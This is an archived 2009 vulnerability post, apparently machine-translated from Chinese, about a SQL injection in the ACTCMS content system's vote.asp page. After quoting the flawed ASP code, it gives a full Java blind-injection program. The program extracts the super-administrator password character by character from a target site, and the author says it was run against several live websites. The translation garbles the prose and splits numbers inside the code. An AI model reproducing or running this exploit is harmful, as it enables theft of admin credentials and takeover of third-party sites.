ACTCMS injection vulnerability-vulnerability warning-the black bar safety net

2009-12-31T00:00:00
ID MYHACK58:62200925775
Type myhack58
Reporter 佚名
Modified 2009-12-31T00:00:00

Description

An ASP of the CMS program. With people is not too much. GOOGLE the keyword“Copyright @ 2 0 0 6 www.actcms.com” not too much.

Today looked at the code. Substantially all of the parameters have all been filtered out. But the vote there is a small problem..

In/plus/vote/vote. asp page. The code is as follows:

ASP/Visual Basic code

  1. ....
  2. if request("voted"). count=0 then
  3. response. write "<script>alert('please select a voting item.'); window. close()</script>"
  4. response. end
  5. end if
  6. for i=1 to request("voted"). count
  7. actcms. actexe("Update vote_act set VoteNum=VoteNum+1 where id="&request("voted")(i))
  8. next
  9. .... 1 0. response. Redirect "index. asp? id="&id&""

id directly from the request inside the take, but because the front is update, Plus behind the the response. redirect, use up more trouble. And this is a General tool is unable to identify the injection point. Because whether we construct what statement in the back, it will jump to index. asp page.

The only change is that when we construct the injection conditions correctly when the number of votes will increase. Hand use up considerable trouble, try now those injection tool bright kid, pangolin and the like also can not be injected, so I do-it-yourself wrote a simple program, because only JAVA, so use JAVA to write. Write the rough. With the exhaustive method, so that writing is more convenient. Slow is slow.

The code is as follows:

Java code

  1. import java. io. BufferedReader;
  2. import java. io. InputStreamReader;
  3. import java. net. URL;
  4. import java. net. URLConnection;
  5. import java. util. regex. Matcher;
  6. import java. util. regex. Pattern;
    1. public class ActCmsGetPwd {
  7. 1 0. public static char[] arr= { '0', '1', '2', '3', '4', '5', '6', '7', '8', 1 1. '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 1 2. 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 1 3. 'z' }; 1 4. 1 5. public static String siteurl = ""; 1 6. public static int voteid = 1; 1 7. public static String charset = ""; 1 8. 1 9. public static void main(String[] args) throws Exception { 2 0. if (args. length < 4) { 2 1. System. out 2 2. . println("usage:java ActCmsGetPwd <siteurl> <voteid> <totalVoteNum> <charset>"); 2 3. System. out. println("siteurl:the target site"); 2 4. System. out. println("voteid:vote id"); 2 5. System. out 2 6. . println("totalVoteNum:the current voting numbers, please view plus/vote/index. asp? id=<voteid>"); 2 7. System. out. println("charset:the target site of the ACTCMS character set, please view the page source code"); 2 8. System. out. println("eg:java ActCmsGetPwd http://www.abc.com/ 1 1 5 gb2312"); 2 9. return; 3 0. } 3 1. siteurl = args[0]; 3 2. voteid = Integer. parseInt(args[1]); 3 3. int preVoteNum = Integer. parseInt(args[2]); 3 4. charset = args[3]; 3 5. 3 6. System. out. println("Code by Ninty , QQ 3 1 9 1 8 6 4"); 3 7. System. out. print("password is :"); 3 8. for (int i = 1; i <= 1 6; i++) { 3 9. System. out. print(send(i, 0, preVoteNum)); 4 0. preVoteNum++; 4 1. } 4 2. System. out. println("\nDone!"); 4 3. } 4 4. 4 5. public static char send(int a, int b, int preVoteNum) throws Exception { 4 6. String sql = "%20and%2 0(select%20top%2 0 1%20mid(password," + a 4 7. The + ",1)%20from%20admin_act%20where%20supertf%2 0=1)%2 0=%2 0'" + arr[b] + "'"; 4 8. URL u = new URL(siteurl 4 9. The + "/Plus/vote/vote. asp? dopost=send&id="+voteid+"&amp; ismore=0&voted=3" + sql); 5 0. URLConnection conn = u. openConnection(); 5 1. BufferedReader reader = new BufferedReader(new InputStreamReader(conn 5 2. . getInputStream(),charset)); 5 3. String str = reader. readLine(); 5 4. while (str != null) { 5 5. if (str. indexOf(" poll numbers:")! = -1) { 5 6. break; 5 7. } 5 8. str = reader. readLine(); 5 9. } 6 0. reader. close(); 6 1. if (! isRight(str, preVoteNum)) { 6 2. return send(a, ++b, preVoteNum); 6 3. } else { 6 4. return arr[b]; 6 5. } 6 6. } 6 7. 6 8. public static boolean isRight(String str, int preVoteNum) { 6 9. if (str == null) { 7 0. System. out. println("cannot read!"); 7 1. System. exit(0); 7 2. } 7 3. Pattern pat = Pattern. compile (": (\\d+)"); 7 4. Matcher mat = pat. matcher(str); 7 5. if (mat. find()) { 7 6. int num = Integer. parseInt(mat. group(1)); 7 7. if (num != preVoteNum) { 7 8. return true; 7 9. } 8 0. } 8 1. 8 2. return false; 8 3. } 8 4. }

The following is the already compiled class file, compile environment JDK6 the. Direct run just fine. actcmsgetpwd.class

In the Internet for a few stand the test a bit, you can get the super-administrator password, but the website seems to not have this vulnerability.